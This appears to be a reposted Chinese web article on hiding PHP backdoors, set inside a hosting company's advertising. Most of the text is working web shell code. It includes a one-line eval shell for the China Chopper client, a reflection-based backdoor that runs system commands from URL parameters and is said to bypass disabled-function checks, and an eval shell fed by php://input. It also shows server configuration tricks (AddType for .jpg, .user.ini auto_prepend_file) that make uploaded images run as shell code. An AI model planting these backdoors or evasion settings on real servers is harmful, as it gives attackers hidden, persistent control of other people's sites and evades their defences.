phpspy 菜刀一句话<?php@eval($_POST['cmd']);?>
创新互联公司主要从事网站制作、做网站、网页设计、企业做网站、公司建网站等业务。立足成都服务龙泉,十多年网站建设经验,价格优惠、服务专业,欢迎来电咨询建站服务:18980820575反射后门
<?php
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c]));
?>
调用如x.php?m=system&c=whoami
后门也可绕过某些检测禁用system函数的防护系统
php://input是用来接收post数据(这里有php://input的介绍)
<?php
@eval(file_get_contents('php://input'))
?>
Post提交 system('whoami');
可以设置任意后缀也可以设置UTF7编码格式shell
AddType application/x-httpd-php .jpg
然后再传一个JPG结尾的shell,访问即可执行了
动态修改php.ini配置文件
User.ini
auto_prepend_file:指定在每个PHP页面执行前所要执行的代码
auto_prepend_file=demo.gif (每个页面都会加载demo.gif)
使用php://input (不需要上传额外的文件)(需要自行打开allow_url_include=on 默认为off)
缺点:不支持.user.ini修改allow_url_include (在PHP5时是PHP_INI_SYSTEM。 从PHP5.2.0起可用。)
http://php.net/manual/zh/ini.list.php
http://php.net/manual/zh/configuration.changes.modes.php
附件:http://down.51cto.com/data/2366063另外有需要云服务器可以了解下创新互联cdcxhl.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。
分享题目:php后门隐藏技巧-创新互联
转载来源:https://www.cdcxhl.com/article22/coojcc.html
成都网站建设公司_创新互联,为您提供企业建站、ChatGPT、自适应网站、App设计、动态网站、网站设计公司
声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联